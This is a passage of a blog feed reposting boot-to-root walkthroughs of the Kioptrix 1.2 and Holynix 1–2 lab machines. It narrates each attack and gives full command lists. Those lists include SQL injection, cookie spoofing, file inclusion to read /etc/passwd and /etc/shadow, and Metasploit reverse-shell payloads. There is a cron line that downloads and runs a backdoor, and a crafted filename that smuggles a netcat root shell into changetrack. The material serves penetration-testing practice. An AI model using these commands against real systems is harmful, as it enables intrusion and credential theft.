firefox http://kioptrix3.com/gallery/photos/home/www/kioptrix3.com/gallery/photos/w835623l98.jpg.html&lt;br /&gt;
sysinfo&lt;br /&gt;
shell&lt;br /&gt;
su loneferret&lt;br /&gt;
echo "import pty; pty.spawn('/bin/bash')" &gt; /tmp/shell.py&lt;br /&gt;
python /tmp/shell.py&lt;br /&gt;
su loneferret   # starwars&lt;br /&gt;
sudo su    # starwars&lt;br /&gt;
cd ~&lt;br /&gt;
ls&lt;br /&gt;
cat Congrats.txt&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
ssh loneferrt@kioptrix3.com   # starwars&lt;br /&gt;
cat CompanyPolicy.README&lt;br /&gt;
sudo ht&lt;br /&gt;
* * * * * root cd /tmp; wget 192.168.0.192/back.door &amp;&amp; chmod +x back.door &amp;&amp; ./back.door; rm /etc/cron.d/exploit   # /etc/cron.d/exploit&lt;br /&gt;
msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 X &gt; /var/www/back.door&lt;br /&gt;
file /var/www/back.door&lt;br /&gt;
/etc/init.d/apache2 start&lt;br /&gt;
msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E&lt;br /&gt;
id&lt;br /&gt;
uname -a&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
- Editing the host file is mentioned in the README which is included (as well as on the blog post).&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5059418085749382381?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5059418085749382381'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5059418085749382381'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-kioptrix-level-12.html' title='HOWTO : Kioptrix - Level 1.2'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-2093962333966558847</id><published>2011-09-11T22:24:00.000+08:00</published><updated>2011-09-11T22:24:14.771+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMap'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit-DB'/><category scheme='http://www.blogger.com/atom/ns#' term='DirBuster'/><category scheme='http://www.blogger.com/atom/ns#' term='Unicornscan'/><category scheme='http://www.blogger.com/atom/ns#' term='Tamper Data'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='knockknock'/><category scheme='http://www.blogger.com/atom/ns#' term='Netcat'/><title type='text'>HOWTO : Holynix - Level 1</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-5-videos/43880-%5Bvideo%5D-holynix-level-1-a.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://blip.tv/g0tmi1k/holynix-level-1-5474680"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?yc9nmb02cgotaa9"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Brief Overview&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The &lt;a href="http://pynstrom.net/holynix.php"&gt;Holynix&lt;/a&gt; series is another collection of operating systems with purposely crafted weakness(es) in them. The usual aim of a "boot-to-root"; try and get a shell with the highest user privilege you can.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Method&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Scanned the network for the target (nmap)&lt;br /&gt;
Port scanned the host (unicornscan)&lt;br /&gt;
Banner grabbed the services running on the open ports (nmap)&lt;br /&gt;
Bypass the login screen (SQL Injection &amp; Cookie modification)&lt;br /&gt;
Collected possible usernames from harvested email addresses (Bash fu)&lt;br /&gt;
Discovered system usernames (Tamper Data)&lt;br /&gt;
Located user online directories (DirBuster)&lt;br /&gt;
Uploaded backdoor with spoofed credentials (Tamper Data)&lt;br /&gt;
Located database credentials &amp; viewed content&lt;br /&gt;
Escalated privileges (Plain text credentials)&lt;br /&gt;
Cloned the user's port knocking profile (KnockKnock)&lt;br /&gt;
Discovered a vulnerable running service to gain future privileges (ChangeTrack)&lt;br /&gt;
Waited for the exploit to be triggered (Scheduled for ever 5 minutes)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
holynix-v1.tar.bz2 [MD5: D19306C6C2305005C72A7811D2B72B51] – (&lt;a href="http://pynstrom.net/holynix.php"&gt;Homepage&lt;/a&gt;).&lt;br /&gt;
A virtual machine (Example: Virtual Box or VMware Player)&lt;br /&gt;
Nmap – (Can be found in BackTrack 5).&lt;br /&gt;
Unicornscan – (Can be found in BackTrack 5's repository).&lt;br /&gt;
Tamper Data – (Can be found in BackTrack 5).&lt;br /&gt;
DirBuster – (Can be found in BackTrack 5).&lt;br /&gt;
Metasploit – (Can be found in BackTrack 5).&lt;br /&gt;
knockknock – (Can be found in Holynix VM!)&lt;br /&gt;
Exploit-DB – (Can be found in BackTrack 5).&lt;br /&gt;
Netcat – (Can be found in BackTrack 5).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Walkthrough&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To start the attack, the target needed to be identified on the network. To achieve this, the attacker used nmap's quick "ping" scan, which reveals the targets IP address and MAC address (and vendor - if known).&lt;br /&gt;
&lt;br /&gt;
By using unicornscan, the attacker was able to quickly scan every TCP &amp; UDP port, in which to see if there are any services listening. The scan showed that only TCP port 80 was open, which happens to be the default web server port. The attacker then checked the results by "banner grabbing" with nmap, which confirmed that TCP port 80 had a web server running on it and at the same time detected the type of operating system being used.&lt;br /&gt;
&lt;br /&gt;
The attacker then choose to interact with the web server by viewing its contents which they were presented with a login page. As the attacker hadn't collected any possible credentials, they tried to bypass it, rather than using brute force. By trial and error the attacker soon discovered that the password field is vulnerable to a basic SQL injection. This allowed the attacker to login as the first user in the database, "alamo".&lt;br /&gt;
&lt;br /&gt;
After viewing the contents of the company's internal web pages, one of the pages displayed each employee's details (name, department, telephone number and email address). To build up an inside knowledge of the company, the attacker collected these details and extracted possible usernames from the email addresses. During this process the attacker discovers that the only form of authentication is the "uid" value in the session cookie and decides to match up the collected usernames to uid values. The attacker is now able to spoof their identity - as 11 different users.&lt;br /&gt;
&lt;br /&gt;
Upon exploring the web site, the attacker discovered a page which displays documents from a pre-populated list. The attacker then modified their requested file, which causes a "Local File Include" (LFI) vulnerability, which is then used to view the current page's source code. The modified request was successful and the content was display inside the current page. By looking though the source code, the attacker was able to see that the page accepted either POST or GET requests - which simplify the process. The attacker continued by requesting a known file which commonly contains details of each user on the system (/etc/passwd); this returned with the same 11 users.&lt;br /&gt;
&lt;br /&gt;
The attacker tests the web server to see if "mod_userdir" is enabled, which allows users folders to be accessible via the web server. The attacker takes the list of usernames which has been collected and added a "~" (Tilde) infront of the usernames, as this is used for the "home directory", for the requested username which is followed after it. The attacker then starts DirBuster, which will request all the values on any web server and return with the HTTP code (e.g. 200=successful, 403=forbidden, etc). DirBuster was able to confirm the 11 users on the system do have their personal directories which are publicly accessible.&lt;br /&gt;
&lt;br /&gt;
Another internal feature on the web server was to allow users to uploads files to their personal folders. The attacker then crafts a reverse backdoor and upload it. However, they discovered that the current user which they are logged in as, alamo, has been disabled and wasn't able to upload files. The attacker tries again, but this time spoofs the requested user ID value to another known user, which was successful. When the attacker navigates to the user folder and opens the uploaded file, to execute the PHP code inside it. They discover the permissions of the file has been altered.&lt;br /&gt;
&lt;br /&gt;
The attacker goes back to the LFI, and views the source code of the upload page. After analysing the code, they discover another page handles the request. Upon viewing the contents, the attacker notices that by using compressed files, it doesn't affect the file permissions. The attacker then re-packages the backdoor file into a compressed container and uploads with the same spoofed credentials. Before executing the backdoor, the attacker sets up a listener to catch the reverse connection. Once everything is ready, the uploaded code is requested, causing Apache to execute the PHP code, creating the server to connect back to the attacker, which achieves a remote shell for the attacker to interact with the remote system.&lt;br /&gt;
&lt;br /&gt;
As the web server is using an internal (MySQL) database, the attacker is aware that the credentials need to be stored in a file to allow the web server to interact with the database. As the apache user executed the backdoor, the attacker has the same privileges as the web server, which allows the attacker to read the settings file. The attacker checks a few common default locations and soon locates the settings file, with the database credentials - in plain text.&lt;br /&gt;
&lt;br /&gt;
The current shell is interactive, however it is unable to run certain commands (e.g. su, login or mysql ), as they required TTY (teletypewriter). However by using python the attacker is able to bypass the limitation and locally connect to mysql with the newly acquired details.&lt;br /&gt;
&lt;br /&gt;
Upon exploring the databases, the attacker sees a few "interesting" named tables, one of which is called "accounts". The attacker displays every entry into this table and discovers the 11 user accounts' details in plain text.&lt;br /&gt;
&lt;br /&gt;
The attacker goes back to the web server to view the internal message board, which employees used to communicate between. One of the messages explains that there has been issues with brute force attempts on the SSH service, so a "port knocking" solution has been used. Another message explains how to setup the new feature; creating the necessary folder and extracting the user's profile into them. The attacker uses the download link and installs the program, knockknock, for themselves.&lt;br /&gt;
&lt;br /&gt;
Switching back to the remote system, the attacker changes users to the first user they used at the beginning, alamo. All the passwords recorded in the database is a mixture of upper and lower case, numbers and symbols with a length greater than 12, this creates a very strong password however as the password is stored in plain text it is very weak, allowing for the user to copy and paste the credentials, becoming that user. This allows the attacker to copy alamo's knockknock profile into the user's local home folder. The attacker then simply downloads the whole content of alamo's profile via the web server and places it into the necessary folder.&lt;br /&gt;
&lt;br /&gt;
The attacker starts the port knocking sequence, each time testing to see if the port has become open for a brief period of time (only a couple of seconds). After the 3rd knock, the attacker is able to connect to the SSH server, which was previously closed. &lt;br /&gt;
&lt;br /&gt;
Back on the internal message board, the attacker discovers there is "changetrack" installed, configured to back up a certain folder and is scheduled to run every five minutes. This services is usually executed with the highest level of privileges, otherwise it wouldn't be able to back up everything possible. The attacker checks that the user he is using, alamo, has access to the folder which is being monitored; turns out only two users are (one of which is alamo!).&lt;br /&gt;
&lt;br /&gt;
The attacker then checks a local copy of a public exploit database, exploitdb, to see if there are any known exploits for this service. There was only one result, which reveals that the service doesn't escape certain filenames, therefore filenames which have been crafted can cause the service to execute shell commands. The attacker notes the example filename, which is given, however instead of doing a "bind" connection, they choose to reserve it instead. Locally, the attacker sets up another listener, and remotely checks for, and, configures a program, netcat, which allows for the network connections to read and execute commands. The reason why the attacker flips the direction of netcat was to allow the target to establish, letting the attacker just wait, rather than for them to keep checking.&lt;br /&gt;
&lt;br /&gt;
The attacker now waits for the changetrack service to be triggered, which shouldn't be long, as it was hinted in the message board; it backs up every five minutes...&lt;br /&gt;
&lt;br /&gt;
...A little while later, the attacker notices that the remote system has executed their command and created a remote shell with the super user, root, account privileges. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nmap 192.168.0.0/24 -sn -n&lt;br /&gt;
us -H -msf -Iv 192.168.0.11 -p 1-65535 &amp;&amp; us -H -mU -Iv 192.168.0.11 -p 1-65535&lt;br /&gt;
nmap -p 1-65535 -T4 -A -v 192.168.0.11&lt;br /&gt;
firefox 192.168.0.11 &amp;   # Username: g0tmi1k   Password: ' OR 1=1 #   id: alamo&lt;br /&gt;
Right click -&gt; View Page Info -&gt; Headers&lt;br /&gt;
Firefox -&gt; Directory&lt;br /&gt;
&lt;br /&gt;
curl -s 192.168.0.11&lt;br /&gt;
curl -s --cookie "uid=1" 192.168.0.11&lt;br /&gt;
curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/&lt;br /&gt;
 /&lt;br /&gt;
 \n/g; s/example.net/example.net\n/g" | grep example.net | sed "s/@example.net//"&lt;br /&gt;
curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/&lt;br /&gt;
 /&lt;br /&gt;
 \n/g; s/example.net/example.net\n/g" | grep example.net | sed "s/@example.net//" &gt; /tmp/users&lt;br /&gt;
wc -l /tmp/users&lt;br /&gt;
for x in $(seq 1 64); do&lt;br /&gt;
  y=$(curl -s --cookie "uid=$x" 192.168.0.11 | grep Welcome, | sed "s/[ \t]*//; s/Welcome, //" | cut -d "." -f1)&lt;br /&gt;
  if [ $y ] ; then echo $x=$y ; fi&lt;br /&gt;
done&lt;br /&gt;
&lt;br /&gt;
Firefox -&gt; Tools -&gt; Tamper Data -&gt; Start Tamper&lt;br /&gt;
firefox http://192.168.0.11/?page=ssp.php    # Display File&lt;br /&gt;
Tamper -&gt; text_file_name: ssp.php&lt;br /&gt;
http://192.168.0.11//index.php?page=ssp.php&amp;text_file_name=/etc/passwd&lt;br /&gt;
&lt;br /&gt;
cat /tmp/users| sed 's/^/~/' &gt;&gt; /tmp/users&lt;br /&gt;
cd /pentest/web/dirbuster&lt;br /&gt;
java -jar DirBuster-0.12.jar -u http://192.168.0.11    # /tmp/users.txt&lt;br /&gt;
&lt;br /&gt;
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw &gt; /tmp/evil.jpg&lt;br /&gt;
&lt;br /&gt;
Firefox -&gt; Tools -&gt; Tamper Data -&gt; Start Tamper&lt;br /&gt;
firefox  # Upload (fails)&lt;br /&gt;
Tamper -&gt; Cookie: uid=2    # id: etenenbaum&lt;br /&gt;
firefox    # Upload again&lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.0.11/~etenenbaum/   # evil.jpg&lt;br /&gt;
firefox http://192.168.0.11/?page=ssp.php    # Display File&lt;br /&gt;
Tamper -&gt; text_file_name: /home/etenenbaum/evil.jpg&lt;br /&gt;
&lt;br /&gt;
http://192.168.0.11//index.php?page=ssp.php&amp;text_file_name=upload.php&lt;br /&gt;
http://192.168.0.11//index.php?page=ssp.php&amp;text_file_name=transfer.php&lt;br /&gt;
&lt;br /&gt;
cd /tmp&lt;br /&gt;
mv evil.jpg evil.php&lt;br /&gt;
chmod +x evil.php&lt;br /&gt;
ls -l evil.php&lt;br /&gt;
tar -cvzf evil.tar.gz evil.php&lt;br /&gt;
ls -l evil*&lt;br /&gt;
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E&lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.0.11/~etenenbaum/&lt;br /&gt;
&lt;br /&gt;
sysinfo&lt;br /&gt;
shell&lt;br /&gt;
id&lt;br /&gt;
pwd&lt;br /&gt;
ls -lah&lt;br /&gt;
cd /var/apache2&lt;br /&gt;
ls -lah&lt;br /&gt;
cat config.inc&lt;br /&gt;
python -c 'import pty; pty.spawn("/bin/sh")'&lt;br /&gt;
mysql -u root -pmY5qLr007p@S5w0rD&lt;br /&gt;
SHOW DATABASES;&lt;br /&gt;
USE creds;&lt;br /&gt;
SHOW TABLES;&lt;br /&gt;
SELECT * FROM accounts;&lt;br /&gt;
quit&lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.0.11/index?page=messageboard.php   # knockknock&lt;br /&gt;
wget http://192.168.0.11/misc/knockknock-0.7.tar.gz&lt;br /&gt;
tar zxvf knockknock-0.7.tar.gz&lt;br /&gt;
cd knockknock-0.7&lt;br /&gt;
head -n 20 INSTALL&lt;br /&gt;
python setup.py install&lt;br /&gt;
&lt;br /&gt;
cd /etc/knockknock.d/profiles/&lt;br /&gt;
ls -lAh&lt;br /&gt;
cp -r alamo ~/knockknock&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
wget -r -np --reject=index* 192.168.0.11/~alamo/knockknock/   &lt;br /&gt;
mv 192.168.0.11/~alamo/knockknock ~/.knockknock/192.168.0.11&lt;br /&gt;
ls -lAh&lt;br /&gt;
#cat config&lt;br /&gt;
nmap -p 22 -T5 -v 192.168.0.11&lt;br /&gt;
#python /tmp/knockknock-0.7/knockknock.py -p 13820 192.168.0.11&lt;br /&gt;
python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 &amp;&amp; nmap -p 13820 -T5 -v 192.168.0.11&lt;br /&gt;
python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 &amp;&amp; ssh alamo@192.168.0.11   # Ih@cK3dM1cR05oF7&lt;br /&gt;
id&lt;br /&gt;
# sudo -l&lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.0.11/index?page=messageboard.php   # Changetrack&lt;br /&gt;
&lt;br /&gt;
cd /pentest/exploits/exploitdb&lt;br /&gt;
grep -i changetrack files.csv&lt;br /&gt;
cat platforms/linux/local/9709.txt&lt;br /&gt;
&lt;br /&gt;
ls -lah /home   # development is set to nobody &amp; developers&lt;br /&gt;
cat /etc/group | grep developers    # Alamo jljohansen&lt;br /&gt;
cd /home/development&lt;br /&gt;
ls -lAh&lt;br /&gt;
whereis nc&lt;br /&gt;
&lt;br /&gt;
nc -lvp 443&lt;br /&gt;
&lt;br /&gt;
touch "&lt;\`nc 192.168.0.192 443 -e \$SHELL\`"
ls
watch -d -n 1 "netstat -ant"   # wait 5 mins

id &amp;&amp; /sbin/ifconfig &amp;&amp; uname -a &amp;&amp; cat /etc/shadow &amp;&amp; ls -lAh /root/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
- When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. The target will not be visible!).&lt;br /&gt;
- There is the possibly of another method of gaining access, as well as different tools (e.g. burpsuite instead of using tamper data) or techniques (modify the SQL injection or permanently edit the cookie value) could be used to achieve the same effect.&lt;br /&gt;
- Some mistakes in the video are more obvious&lt;br /&gt;
- On reflection, a few commands should have been issues to verify the comments on the message box, such as: "ls /etc | grep -i changetrack", and "cat /etc/changetrack.conf".&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-2093962333966558847?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2093962333966558847'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2093962333966558847'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-holynix-level-1.html' title='HOWTO : Holynix - Level 1'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3994343510353423320</id><published>2011-09-11T22:03:00.003+08:00</published><updated>2011-09-11T22:25:01.967+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMap'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploit-DB'/><category scheme='http://www.blogger.com/atom/ns#' term='DirBuster'/><category scheme='http://www.blogger.com/atom/ns#' term='Netdiscover'/><category scheme='http://www.blogger.com/atom/ns#' term='Unicornscan'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='John the Ripper'/><title type='text'>HOWTO : Holynix - Level 2</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-5-videos/44124-%5Bvideo%5D-holynix-level-2-a.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Video Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://blip.tv/g0tmi1k/holynix-level-2-5494348"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?70m714m55v4c6df"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Brief Overview&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://pynstrom.net/holynix.php"&gt;Holynix&lt;/a&gt; is a series of operating systems with purposely designed weakness(es) left inside. The aim of them is to go from "boot-to-root"; the user has to try and get a shell with the highest user privilege they can reach.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Method&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Scanned network for the target (Netdiscover)&lt;br /&gt;
Configured IP address (192.168.1.0/24)&lt;br /&gt;
Port scanned the target (unicornscan)&lt;br /&gt;
Banner grabbed the services running on the open ports (nmap)&lt;br /&gt;
Added the target's IP to the host file &amp; Re-configured DNS settings&lt;br /&gt;
Successfully replicated the DNS databases (Zone Transfer)&lt;br /&gt;
Successfully brute forced web server directories (DirBuster)&lt;br /&gt;
Detected &amp; exploited outdated software (phpMyAdmin)&lt;br /&gt;
Discovered an internal document (DirBuster)&lt;br /&gt;
Cracked FTP passwords (John The Ripper)&lt;br /&gt;
Uploaded a web backdoor (Metasploit)&lt;br /&gt;
Escalated privileges via a vulnerable kernel version&lt;br /&gt;
Located MySQL database details&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
kolynix-v2.tar.bz2 (MD5: 2B91038DE5C5150BFC48AA39C84E7E71) – (&lt;a href="http://pynstrom.net/holynix.php"&gt;Homepage&lt;/a&gt;).&lt;br /&gt;
A virtual machine (Example: Virtual Box or VMware Player).&lt;br /&gt;
Netdiscover – (Can be found on BackTrack 5).&lt;br /&gt;
Nmap – (Can be found on BackTrack 5).&lt;br /&gt;
Unicornscan – (Can be found in BackTrack 5's repository).&lt;br /&gt;
DirBuster – (Can be found in BackTrack 5).&lt;br /&gt;
Exploit-DB – (Can be found on BackTrack 5).&lt;br /&gt;
John The Ripper – (Can be found on BackTrack 5).&lt;br /&gt;
Metasploit – (Can be found on BackTrack 5).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Walkthrough&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To begin, the attacker needed to locate the target. This was accomplished by using "netdiscover", as it was able to scan for hosts on multiple IP ranges quickly. The output from the scan had the target on a different IP range from the DHCP server's pool, meaning the target had a static IP address. The IP address, MAC address and vendor was now known to the attacker and they updated their IP address to fit inside the same IP range as the target.&lt;br /&gt;
&lt;br /&gt;
Once the attacker was in the same subnet as the target, the attacker completed a full port scan of both TCP &amp; UDP on the target by using "unicornscan". When the scan had finished, the results showed that the target had four TCP ports open: 21, 22, 53 &amp; 80, as well as one UDP port, 53.&lt;br /&gt;
&lt;br /&gt;
Afterwards, the attacker wanted to know what services were being used on these ports. By using "nmap" to banner grab the services, the protocols and services (and possible versions) were able to be identified, along with finger printing the operating system which was being used. The outcome of the scan revealed that the services being used matched up to their default protocol ports; ftp, ssh, dns and web services.&lt;br /&gt;
&lt;br /&gt;
The attacker then proceeded by interacting with the target's web server, and by doing so, they were able to find some useful information; the domain name, name servers and each user had their own sub-domain. The attacker updates their system to reflect the newly discovered information by replacing the DNS server to point to the target.&lt;br /&gt;
&lt;br /&gt;
The attacker then sets out to produce a list of possible usernames via the sub-domain by using DNS enumeration. By using "dig" the attacker was able to gather details about the domain, zincftp.com. This revealed that there were two DNS servers; the primary server was pointed to itself, the secondary server had an IP address increased by one of the primary servers. From the earlier nmap scan, the attacker knew that this IP address wasn't currently being used. The attacker then attempted a zone transfer as DNS port (TCP 53) was open, which would clone the DNS database; however it failed. But, by the attacker changing their IP address to match the secondary DNS server and re-trying the request, this time the attacker was presented with a list of all the known values for the DNS service.&lt;br /&gt;
&lt;br /&gt;
The next stage was to extract a list of all known hosts from the sub-domains as well as a possible list of usernames. Upon futher inspection of the list, the attacker then filtered out all the primary server values - which left a few interesting results such as; the nameservers (which were already known), a mail server (which was on a completely different IP range) and trusted.zincftp.com.&lt;br /&gt;
&lt;br /&gt;
The attacker then moves their force back to the web server. "DirBuster" was able to brute force a list of directories on a web server and check their status. In the first scan, the attacker notices two folders (/phpMyAdmin/ &amp; /setup_guide/) which returned "HTTP response code 403 - Forbidden". The attacker then changes their IP address to match the same value as "trusted.zincftp.com" and re-open another instance of DirBuster to compare the output. After the second scan had completed, the two previous denied folders, had returned "HTTP response code 200 - OK". The attacker then chooses to view what was meant to be hidden and discovers that one page is an unprotected phpMyAdmin page as well as a directory listing which only contained one file "todo".&lt;br /&gt;
&lt;br /&gt;
By exploring the phpMyAdmin page, the attacker was able to view the contents of the database which contained two usernames and their email addresses, which the attacker adds to their list of known users. Afterwards, the attacker checks the version of phpMyAdmin and notices it's a very old version and checks to see if there has been any known exploits released for it in their local copy of public exploits from "exploit-db". After checking the versions the attacker discovers that there is a remote directory traversal vulnerability.&lt;br /&gt;
&lt;br /&gt;
The exploit allowed the attacker to view any files which had the same permission that phpMyAdmin was being run as. By using this, the attacker was able to discover all the user accounts on the system, by using a known file which commonly contains details of each user on the system (/etc/passwd). After analysing the file the attacker saw that not every user had shell access, and filtered these users out, as they wouldn't be able to gain remote shell. The attacker then made a note of those usernames in a separate file, as they have higher priority.&lt;br /&gt;
&lt;br /&gt;
Afterwards the attacker viewed the "todo" file on the web server, which displayed the internal working of the company when a new user is added to the system. The last stage was to add them to the FTP service, allowing them to download/upload files to the server. By using the phpMyAdmin exploit, the attacker was able to read the encrypted password file which contained the user credentials.&lt;br /&gt;
&lt;br /&gt;
The attacker now had a local copy of the users which were allowed to use the FTP service, along with their passwords, however, it was encrypted. The attacker then locates a small wordlist to attempt to brute force the passwords. After loading the passwords and wordlist into "John The Ripper", the attacker discovered two passwords (jack-in-the-box and millionaire) which were used (due to them being inside the wordlist), along with the two usernames (dhammond and tmartin).&lt;br /&gt;
&lt;br /&gt;
As the attacker was now able to view the user web folder via [username].zincftp.com, as well as being able to interact with the ftp server, the attacker created and uploaded a small test file to see if the two services overlapped with each other. (Editor's note: The VM at this stage had "run out of room", however, after restarting the holynix virtual machine it worked). The result was the message "Hello World" was displayed, meaning; FTP &amp; Web root folders were the same, the attacker was able execute PHP commands. From this, the attacker then crafts a web based backdoor via "metasploit", setups a listener to catch the reverse connection and repeated the same procedure as before. &lt;br /&gt;
&lt;br /&gt;
As soon as the php backdoor file was opened, it connected back to the attacker giving them remote access to the system, which allowed the attacker to interact with the operating system. The attacker continued by listing all the files of each user's personal home folder. As the backdoor was executed by the web server, the backdoor inherited the same permissions, and, as the web server had to display each user folder the attacker can also do the same. There were various personal files to some users; however the attacker spotted an email, and upon reading it discovered that the user had their password reset to their name along with a few random characters. The attacker located the username the email was sent to, after looking up the user's details by using the same file as before (/etc/passwd), to discover their full name. It was also a user that had been discovered before, due to the user having permission to login remotely.&lt;br /&gt;
&lt;br /&gt;
The attacker now connects to the target via "SSH" with the newly acquired details and as a result had a remote TTY shell. The attacker then checked the current kernel version, and discovered like phpMyAdmin, it was out-dated, and checks in the same manner to see if there is a public exploit for it. After locating a possible exploit, the attacker then copied it to their root web folder, checked that the file had permission to be accessed by "Apache", that there wasn't any comments at the start of the file and then started the web server, to make the file accessible to the target.&lt;br /&gt;
&lt;br /&gt;
Going back to the target, the attacker navigates to a folder which they usually have write access as well as the ability to execute programs, /tmp. The attacker then downloads the exploit locally on the target and then compiles it. As soon as the newly created program had been executed the attacker became the super user, root. The attacker now has access to the complete system...&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Game over&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The attacker decided that they wished to harvest the system for credentials. As databases can contain valuable and sensitive information, the attacker opted to gain access. The attacker was running as root, which would allow them to reset the password to anything they wished. However, this would have caused the functionality to stop, so instead they located them (as they had to be stored somewhere allowing the web server to interact with the database). The attacker navigated to a common location for the web root folder to be, and then, by searching for all files with php extension that use a common function to connect to a MySQL database, the attacker found all the insistences of the command. The attacker was then able to view the complete file which contained the phrase, and discovered the credentials in plain text.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;netdiscover&lt;br /&gt;
ifconfig eth0&lt;br /&gt;
ifconfig eth0 192.168.1.192&lt;br /&gt;
ifconfig eth0&lt;br /&gt;
